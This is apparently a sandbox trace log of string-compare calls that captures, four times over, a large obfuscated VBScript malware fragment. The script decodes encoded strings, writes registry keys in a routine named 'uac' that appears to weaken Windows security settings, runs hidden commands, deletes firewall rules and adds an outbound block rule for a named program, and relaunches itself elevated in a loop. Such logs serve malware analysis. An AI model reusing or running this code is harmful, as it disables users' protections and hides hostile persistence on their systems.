bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95 [0222.988] wcsncmp (_String1="icy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0222.988] wcsncmp (_String1="cy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 86 [0222.989] wcsncmp (_String1="y = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 108 [0222.989] wcsncmp (_String1=" = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.989] wcsncmp (_String1="= 